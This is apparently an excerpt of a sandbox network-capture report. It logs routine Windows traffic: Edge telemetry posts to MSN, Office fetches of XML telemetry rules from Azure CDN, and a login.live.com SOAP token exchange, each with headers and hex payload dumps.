                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                        x-ms-request-id: 2155a01d-401e-00a3-768c-3a8b09000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234950Z-1777c6cb754lvj6mhC1TEBke940000000ab000000000gq24
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        105192.168.2.54989320.189.173.94437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732146588055&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 5291
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC5291OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 32 33 3a 34 39 3a 34 38 2e 30 35 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 36 31 34 39 66 39 2d 63 33 62 34 2d 34 36 32 30 2d 38 37 65 32 2d 31 32 61 65 30 39 32 66 66 31 63 61 22 2c 22 65 70 6f 63 68 22 3a 22 34 30 31 35 31 30 38 37 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-20T23:49:48.054Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"2d6149f9-c3b4-4620-87e2-12ae092ff1ca","epoch":"401510876"},"app":{"locale"
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=895c48df708f4659b80e0418db3db553&HASH=895c&LV=202411&V=4&LU=1732146590559; Domain=.microsoft.com; Expires=Thu, 20 Nov 2025 23:49:50 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: MS0=cfad0f622a804b709c2ca872a86cb24a; Domain=.microsoft.com; Expires=Thu, 21 Nov 2024 00:19:50 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                        time-delta-millis: 2504
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:49 GMT
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        106192.168.2.54989413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:50 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                        x-ms-request-id: 3585b350-301e-005d-097c-3be448000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234950Z-178bfbc474btvfdfhC1NYCa2en00000000vg000000000m7d
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        107192.168.2.54989520.189.173.94437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732146588118&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 9665
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                        2024-11-20 23:49:50 UTC9665OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 32 33 3a 34 39 3a 34 38 2e 31 31 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 36 31 34 39 66 39 2d 63 33 62 34 2d 34 36 32 30 2d 38 37 65 32 2d 31 32 61 65 30 39 32 66 66 31 63 61 22 2c 22 65 70 6f 63 68 22 3a 22 34 30 31 35 31 30 38 37 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-11-20T23:49:48.117Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"2d6149f9-c3b4-4620-87e2-12ae092ff1ca","epoch":"401510876"},"app":{"loca
                                                                                                                                                                                                                                                        2024-11-20 23:49:51 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=9f6394ab46f84e459d8fcc13abb09d6d&HASH=9f63&LV=202411&V=4&LU=1732146591066; Domain=.microsoft.com; Expires=Thu, 20 Nov 2025 23:49:51 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: MS0=5861336c976644b8a3a90754893da170; Domain=.microsoft.com; Expires=Thu, 21 Nov 2024 00:19:51 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                        time-delta-millis: 2948
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:50 GMT
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        108192.168.2.54989640.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:51 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 3592
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:51 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC653INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:48:52 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.9
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C515_BL2
                                                                                                                                                                                                                                                        x-ms-request-id: dcb96b87-2c89-42ad-a829-8fff38ccce45
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: BL02EPF00027829 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:51 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 11389
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        109192.168.2.54989713.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:51 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:52 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 485
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                        x-ms-request-id: 9ca94d1e-301e-0000-0f9c-3beecc000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234952Z-1777c6cb754wcxkwhC1TEB3c6w0000000a6000000000m072
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        110192.168.2.54989813.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:52 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 411
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                        x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234952Z-1777c6cb754g9zd5hC1TEBfvpw0000000aag00000000y22s
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        111192.168.2.54989913.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:52 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 470
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                        x-ms-request-id: 137cb315-101e-0017-3264-3b47c7000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234952Z-178bfbc474bw8bwphC1NYC38b400000000c000000000342a
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
